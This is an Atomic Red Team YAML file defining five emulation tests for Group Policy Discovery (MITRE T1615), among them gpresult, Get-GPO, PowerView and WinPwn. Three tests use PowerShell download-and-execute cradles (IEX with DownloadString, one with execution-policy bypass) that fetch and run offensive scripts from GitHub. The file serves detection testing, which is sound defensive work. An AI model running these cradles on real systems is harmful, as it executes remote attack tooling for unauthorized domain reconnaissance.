security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
85339c0e48af58a964dcf2e15e1fef554062f4ee
atomic-red-team/atomics/T1615/T1615.yaml
T
Hare Sudhan bfdd702717 Remove unused variable (#3040)
2025-01-28 00:02:41 -05:00

76 lines
4.4 KiB
YAML
Raw Blame History

attack_technique: T1615
display_name: 'Group Policy Discovery'
atomic_tests:
- name: Display group policy information via gpresult
auto_generated_guid: 0976990f-53b1-4d3f-a185-6df5be429d3b
description: |
Uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information for a remote user and computer
The /z parameter displays all available information about Group Policy. More parameters can be found in the linked Microsoft documentation
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult
https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/
Turla has used the /z and /v parameters: https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: false
command: |
gpresult /z
- name: Get-DomainGPO to display group policy information via PowerView
auto_generated_guid: 4e524c4e-0e02-49aa-8df5-93f3f7959b9f
description: Use PowerView to Get-DomainGPO This will only work on Windows 10 Enterprise and A DC Windows 2019.
supported_platforms:
- windows
executor:
command: powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://github.com/BC-SECURITY/Empire/blob/86921fbbf4945441e2f9d9e7712c5a6e96eed0f3/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-DomainGPO"
name: powershell
elevation_required: true
- name: WinPwn - GPOAudit
auto_generated_guid: bc25c04b-841e-4965-855f-d1f645d7ab73
description: Check domain Group policies for common misconfigurations using Grouper2 via GPOAudit function of WinPwn
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
GPOAudit -noninteractive -consoleoutput
name: powershell
- name: WinPwn - GPORemoteAccessPolicy
auto_generated_guid: 7230d01a-0a72-4bd5-9d7f-c6d472bc6a59
description: Enumerate remote access policies through group policy using GPORemoteAccessPolicy function of WinPwn
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
GPORemoteAccessPolicy -consoleoutput -noninteractive
name: powershell
- name: MSFT Get-GPO Cmdlet
auto_generated_guid: 52778a8f-a10b-41a4-9eae-52ddb74072bf
description: 'The Get-GPO cmdlet gets one Group Policy Object (GPO) or all the GPOs in a domain. Tested on Windows Server 2019 as a domain user with computer joined to domain. Reference: https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps'
supported_platforms:
- windows
input_arguments:
gpo_output:
description: The output of the Get-GPO cmdlet
type: string
default: $env:temp\GPO_Output.txt
gpo_param:
description: You can specify a GPO by its display name or by its globally unique identifier (GUID) to get a single GPO, or you can get all the GPOs in the domain through the All parameter
type: string
default: -All
dependency_executor_name: powershell
dependencies:
- description: Add Rsat.ActiveDirectory.DS
prereq_command: if(Get-WindowsCapability -Online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0 | Where-Object { $_.State -eq 'Installed' }){ exit 0 } else { exit 1 }
get_prereq_command: Add-WindowsCapability -online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0
- description: 'Add Rsat.GroupPolicy.Management.Tools ###Two RSAT Modules needed for this to work on Win10, WinServer 2019 works by default. This will take a long time (almost 2 minutes) to install RSAT Manually###.'
prereq_command: if(Get-WindowsCapability -Online -Name Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0 | Where-Object { $_.State -eq 'Installed' }){ exit 0 } else { exit 1 }
get_prereq_command: Add-WindowsCapability -online -Name Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0
executor:
command: 'Get-GPO -Domain $ENV:userdnsdomain #{gpo_param} >> #{gpo_output}'
cleanup_command: del $env:temp\GPO_Output.txt -erroraction silentlycontinue
name: powershell
elevation_required: true
Reference in New Issue View Git Blame Copy Permalink